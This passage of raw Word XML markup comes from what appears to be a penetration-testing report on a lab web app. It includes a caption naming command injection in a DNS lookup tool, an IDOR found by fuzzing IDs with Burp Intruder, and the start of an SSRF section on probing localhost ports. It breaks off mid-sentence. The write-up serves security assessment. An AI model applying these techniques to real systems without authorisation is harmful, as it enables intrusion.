          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in Image 5.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE0D80B" w14:textId="77777777" w:rsidR="0018438B" w:rsidRPr="00D77DFE" w:rsidRDefault="0018438B" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65FC5DD1" w14:textId="4C640C35" w:rsidR="009D2113" w:rsidRPr="00D77DFE" w:rsidRDefault="009D2113" w:rsidP="00047D2A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75ECD8F5" wp14:editId="103CA6C6">
            <wp:extent cx="4899546" cy="630943"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183683487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34873" name="Picture 19" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5004755" cy="644491"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB4C9A5" w14:textId="50765BB2" w:rsidR="009A7412" w:rsidRPr="00D77DFE" w:rsidRDefault="0018438B" w:rsidP="009A7412">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Image 5.5: </w:t>
      </w:r>
      <w:r w:rsidR="0025388A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Command Injection in DNS Lookup Tool</w:t>
      </w:r>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB69E58" w14:textId="433E7254" w:rsidR="006E3C52" w:rsidRPr="00D77DFE" w:rsidRDefault="00545188" w:rsidP="00D77DFE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc223521131"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DD5501" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E3C52" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Insecure Direct Object Reference (IDOR) in Art Retrieval Function</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w14:paraId="7BFC649B" w14:textId="29F7B70F" w:rsidR="00B27556" w:rsidRPr="00D77DFE" w:rsidRDefault="00B27556" w:rsidP="00736606">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ASCII Art Gallery displays artwork based on a numeric ID, with initial testing showing valid results only for IDs 1-6 and all other values returning “art not found</w:t>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="129" w:name="paragraph72"/>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource72"</w:instrText>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Figure A.53</w:t>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">and in </w:t>
      </w:r>
      <w:bookmarkStart w:id="130" w:name="paragraph73"/>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource73"</w:instrText>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Figure A.54</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="009D4A0A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D4A0A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.” To identify hidden content, Burp Suite Intruder was used to fuzz the ID parameter across a wider range (0–100)</w:t>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="131" w:name="paragraph74"/>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource74"</w:instrText>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Figure A.55</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="009D4A0A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D4A0A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>. When sorted by response length, one outlier appeared: payload 74 produced a noticeably larger response than all others</w:t>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="132" w:name="paragraph75"/>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource75"</w:instrText>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Figure A.56</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="009D4A0A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D4A0A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Manually requesting </w:t>
      </w:r>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>art_id=74</w:t>
      </w:r>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>revealed</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> an undocumented artwork intended for administrative use only</w:t>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="133" w:name="paragraph76"/>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource76"</w:instrText>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Figure A.57</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="009D4A0A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D4A0A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6758D7F2" w14:textId="75C2D713" w:rsidR="007A7549" w:rsidRPr="00D77DFE" w:rsidRDefault="00545188" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc223521132"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DD5501" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A7549" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="007A7549" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>Side Request Forgery via Unsanitized URL Fetcher Functionality</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w14:paraId="6F27C89A" w14:textId="7D8DF34E" w:rsidR="006E3C52" w:rsidRPr="00D77DFE" w:rsidRDefault="00B27556" w:rsidP="000224B3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The URL Fetcher tool issues server‑side curl requests to user‑provided URLs</w:t>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="135" w:name="paragraph77"/>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource77"</w:instrText>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.58</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
      <w:r w:rsidR="00736606"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Because no validation restricts outbound destinations, the feature is susceptible to SSRF, allowing access to internal services. To identify reachable internal ports, Burp Suite Intruder was used to probe localhost</w:t>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
